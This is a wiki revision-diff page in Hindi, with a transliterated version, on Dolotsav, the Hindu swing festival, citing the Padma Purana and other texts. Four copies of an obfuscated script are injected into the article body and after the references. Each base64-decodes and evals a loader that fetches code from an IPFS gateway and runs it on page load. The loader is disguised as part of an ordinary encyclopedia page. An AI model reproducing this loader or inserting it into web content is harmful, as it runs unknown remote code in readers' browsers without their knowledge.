Difference between revisions of "दोलोत्सव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*[[पद्म पुराण]]<ref>पद्मपुराण (4|80|45-50)</ref> जिसमें आया है कि कलियुग में फाल्गुन चतुर्दशी पर आठवें प्रहर में या पूर्णिमा तथा प्रथमा के योग पर दोलोत्सव 3 दिनों या 5 दिनों तक किया जाता है।
+
*[[पद्म पुराण]]<ref>पद्मपुराण (4|80|45-50</ref> जिसमें आया है कि कलियुग में फाल्गुन चतुर्दशी पर आठवें प्रहर में या पूर्णिमा तथा प्रथमा के योग पर दोलोत्सव 3 दिनों या 5 दिनों तक किया जाता है।
 
*पालने में झूलते हुए [[कृष्ण]] को दक्षिणामुख हो एक बार देख लेने से पापों के भार से मुक्ति मिल जाती है।
 
*पालने में झूलते हुए [[कृष्ण]] को दक्षिणामुख हो एक बार देख लेने से पापों के भार से मुक्ति मिल जाती है।
*पद्मपुराण<ref>पद्मपुराण (6|85)</ref> में [[विष्णु]] का दोलोत्सव भी वर्णित है।  
+
*पद्मपुराण<ref>पद्मपुराण (6|85</ref> में [[विष्णु]] का दोलोत्सव भी वर्णित है।  
 
*[[चैत्र]] शुक्ल तृतीया पर गौरी का तथा<ref>पुरुषचिन्तामणि 85, व्रतराज 84</ref> राम का दोलोत्सव<ref>समयमयूख 35</ref> होता है।  
 
*[[चैत्र]] शुक्ल तृतीया पर गौरी का तथा<ref>पुरुषचिन्तामणि 85, व्रतराज 84</ref> राम का दोलोत्सव<ref>समयमयूख 35</ref> होता है।  
 
*कृष्ण का दोलोत्सव चैत्र शुक्ल [[एकादशी]]<ref>पद्मपुराण 6|85</ref> पर होता है।
 
*कृष्ण का दोलोत्सव चैत्र शुक्ल [[एकादशी]]<ref>पद्मपुराण 6|85</ref> पर होता है।

Revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • padm puran[1] jisamean aya hai ki kaliyug mean phalgun chaturdashi par athavean prahar mean ya poornima tatha prathama ke yog par dolotsav 3 dinoan ya 5 dinoan tak kiya jata hai.
  • palane mean jhoolate hue krishna ko dakshinamukh ho ek bar dekh lene se papoan ke bhar se mukti mil jati hai.
  • padmapuran[2] mean vishnu ka dolotsav bhi varnit hai.
  • chaitr shukl tritiya par gauri ka tatha[3] ram ka dolotsav[4] hota hai.
  • krishna ka dolotsav chaitr shukl ekadashi[5] par hota hai.
  • gayatri ke saman mantr yah hai—'oan dolaroodhay vidmahe madhavay ch dhimahi. tanno devah prachodayath..'
  • aj bhi mathura-vrindavan, ayodhya, dvaraka, dakor adi mean krishna ka dolotsav manaya jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. padmapuran (4|80|45-50
  2. padmapuran (6|85
  3. purushachintamani 85, vrataraj 84
  4. samayamayookh 35
  5. padmapuran 6|85

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>